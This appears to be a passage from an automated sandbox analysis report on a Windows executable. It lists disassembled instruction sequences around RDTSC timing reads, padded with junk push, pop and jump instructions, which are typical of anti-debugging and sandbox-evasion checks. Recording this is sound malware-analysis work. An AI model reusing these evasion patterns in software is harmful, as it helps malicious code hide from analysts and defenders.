Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DA0A93 second address: DA0AA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F2BDCD5A7B0h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DA0BE6 second address: DA0BEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DA0BEA second address: DA0BF4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2BDCD5A7B2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DA0BF4 second address: DA0BFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DA0BFA second address: DA0C04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DB0F74 second address: DB0F79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DB0F79 second address: DB0F94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2BDCD5A7B5h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DB0F94 second address: DB0FAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F2BDC8ABB16h 0x0000000d jmp 00007F2BDC8ABB1Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DB0B37 second address: DB0B43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F2BDCD5A7ACh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DB0B43 second address: DB0B47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DB2F52 second address: DB2F56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DB2F56 second address: DB2F86 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jno 00007F2BDC8ABB16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jne 00007F2BDC8ABB1Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 jnp 00007F2BDC8ABB16h 0x0000001b jmp 00007F2BDC8ABB1Dh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DB2C63 second address: DB2C74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7ABh 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DB8604 second address: DB8608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DB8608 second address: DB8613 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F2BDCD5A7A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DB8613 second address: DB8631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F2BDC8ABB1Fh 0x0000000d pop edi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DCAA30 second address: DCAA4E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F2BDCD5A7B3h 0x00000008 pop ecx 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DC9383 second address: DC9389 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DC9389 second address: DC938D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DC9D00 second address: DC9D0C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2BDC8ABB16h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DC9D0C second address: DC9D11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DC9D11 second address: DC9D17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: DCA6C9 second address: DCA714 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 ja 00007F2BDCD5A7A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F2BDCD5A7B8h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 jnp 00007F2BDCD5A7A6h 0x0000001b pop edx 0x0000001c pushad 0x0000001d jo 00007F2BDCD5A7A6h 0x00000023 jmp 00007F2BDCD5A7B2h 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: DCD3B4 second address: DCD3BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: DCD3BC second address: DCD3C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: DCD53A second address: DCD565 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2BDC8ABB2Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b ja 00007F2BDC8ABB18h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: DCD565 second address: DCD569 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: E04F00 second address: E04F12 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2BDC8ABB1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: E0E5E3 second address: E0E5E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: E0E5E7 second address: E0E5EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: E10BF3 second address: E10C28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F2BDCD5A7B8h 0x0000000d jmp 00007F2BDCD5A7AEh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: E10C28 second address: E10C2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: E10C2C second address: E10C38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F2BDCD5A7A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: E13196 second address: E1319A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: E1319A second address: E131A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: E131A0 second address: E131A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: E13005 second address: E13019 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2BDCD5A7AEh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: E13019 second address: E1301D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: E1301D second address: E1302A instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2BDCD5A7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: E20851 second address: E20855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: E20855 second address: E2089D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7B0h 0x00000007 jmp 00007F2BDCD5A7B3h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F2BDCD5A7B9h 0x00000015 jbe 00007F2BDCD5A7A6h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: E2089D second address: E208BF instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2BDC8ABB16h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2BDC8ABB24h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: E20525 second address: E2052D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: E2052D second address: E20532 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: EE58F9 second address: EE58FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: EE58FE second address: EE591F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 jmp 00007F2BDC8ABB1Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jng 00007F2BDC8ABB28h 0x00000014 je 00007F2BDC8ABB22h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: EE591F second address: EE5925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: EE503E second address: EE5075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2BDC8ABB20h 0x00000009 popad 0x0000000a jmp 00007F2BDC8ABB24h 0x0000000f jbe 00007F2BDC8ABB18h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: EE5075 second address: EE5079 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: EE537D second address: EE5381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: EE5381 second address: EE5385 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: EE54FD second address: EE5503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: EE5503 second address: EE5518 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7B1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: EE6FCF second address: EE6FD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: EED30F second address: EED319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F2BDCD5A7A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: EED319 second address: EED31D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: EED31D second address: EED323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: EED323 second address: EED328 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC0061 second address: 6EC0101 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b call 00007F2BDCD5A7B7h 0x00000010 call 00007F2BDCD5A7B8h 0x00000015 pop eax 0x00000016 pop edi 0x00000017 pushad 0x00000018 movzx eax, di 0x0000001b pushfd 0x0000001c jmp 00007F2BDCD5A7B3h 0x00000021 and ax, 33FEh 0x00000026 jmp 00007F2BDCD5A7B9h 0x0000002b popfd 0x0000002c popad 0x0000002d popad 0x0000002e xchg eax, ebp 0x0000002f jmp 00007F2BDCD5A7AEh 0x00000034 mov ebp, esp 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC0101 second address: 6EC0105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC0105 second address: 6EC0122 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC0122 second address: 6EC0128 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC0128 second address: 6EC012C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC012C second address: 6EC0154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr fs:[00000030h] 0x0000000e jmp 00007F2BDC8ABB1Fh 0x00000013 sub esp, 18h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov ecx, edi 0x0000001b mov eax, ebx 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC0154 second address: 6EC018E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b mov di, cx 0x0000000e push esi 0x0000000f mov edx, 4F4FF35Ch 0x00000014 pop ebx 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F2BDCD5A7AEh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC018E second address: 6EC01C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F2BDC8ABB1Eh 0x00000013 adc ch, FFFFFFD8h 0x00000016 jmp 00007F2BDC8ABB1Bh 0x0000001b popfd 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC01C0 second address: 6EC0208 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [eax+10h] 0x0000000c jmp 00007F2BDCD5A7AEh 0x00000011 xchg eax, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F2BDCD5A7B7h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC0208 second address: 6EC020F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, bh 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC020F second address: 6EC0259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007F2BDCD5A7ADh 0x0000000f xor eax, 385C3136h 0x00000015 jmp 00007F2BDCD5A7B1h 0x0000001a popfd 0x0000001b jmp 00007F2BDCD5A7B0h 0x00000020 popad 0x00000021 xchg eax, esi 0x00000022 pushad 0x00000023 pushad 0x00000024 mov edi, ecx 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 mov dl, C7h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC0259 second address: 6EC02D2 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F2BDC8ABB1Eh 0x00000008 or cl, FFFFFFB8h 0x0000000b jmp 00007F2BDC8ABB1Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 mov esi, dword ptr [775606ECh] 0x0000001a jmp 00007F2BDC8ABB26h 0x0000001f test esi, esi 0x00000021 jmp 00007F2BDC8ABB20h 0x00000026 jne 00007F2BDC8ACC63h 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f pushfd 0x00000030 jmp 00007F2BDC8ABB1Ch 0x00000035 sub esi, 53574778h 0x0000003b jmp 00007F2BDC8ABB1Bh 0x00000040 popfd 0x00000041 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC02D2 second address: 6EC0338 instructions: 0x00000000 rdtsc 0x00000002 call 00007F2BDCD5A7B8h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushfd 0x0000000b jmp 00007F2BDCD5A7ABh 0x00000010 and si, A3EEh 0x00000015 jmp 00007F2BDCD5A7B9h 0x0000001a popfd 0x0000001b popad 0x0000001c xchg eax, edi 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F2BDCD5A7B8h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC0338 second address: 6EC033C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC033C second address: 6EC0342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC0342 second address: 6EC0348 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC0348 second address: 6EC034C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC034C second address: 6EC036A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F2BDC8ABB21h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC036A second address: 6EC036E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC036E second address: 6EC0374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC0374 second address: 6EC037A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC037A second address: 6EC037E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC037E second address: 6EC03B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c jmp 00007F2BDCD5A7B0h 0x00000011 call dword ptr [77530B60h] 0x00000017 mov eax, 756AE5E0h 0x0000001c ret 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC03B7 second address: 6EC03D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC03D4 second address: 6EC03DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC03DA second address: 6EC03DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC03DE second address: 6EC0417 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 00000044h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push edi 0x00000011 pop esi 0x00000012 call 00007F2BDCD5A7B7h 0x00000017 pop eax 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC0417 second address: 6EC0430 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2BDC8ABB25h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC0430 second address: 6EC043F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov edi, ecx 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC043F second address: 6EC04AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, bx 0x00000006 pushfd 0x00000007 jmp 00007F2BDC8ABB29h 0x0000000c jmp 00007F2BDC8ABB1Bh 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 xchg eax, edi 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F2BDC8ABB24h 0x0000001d xor si, B8C8h 0x00000022 jmp 00007F2BDC8ABB1Bh 0x00000027 popfd 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F2BDC8ABB26h 0x0000002f rdtsc
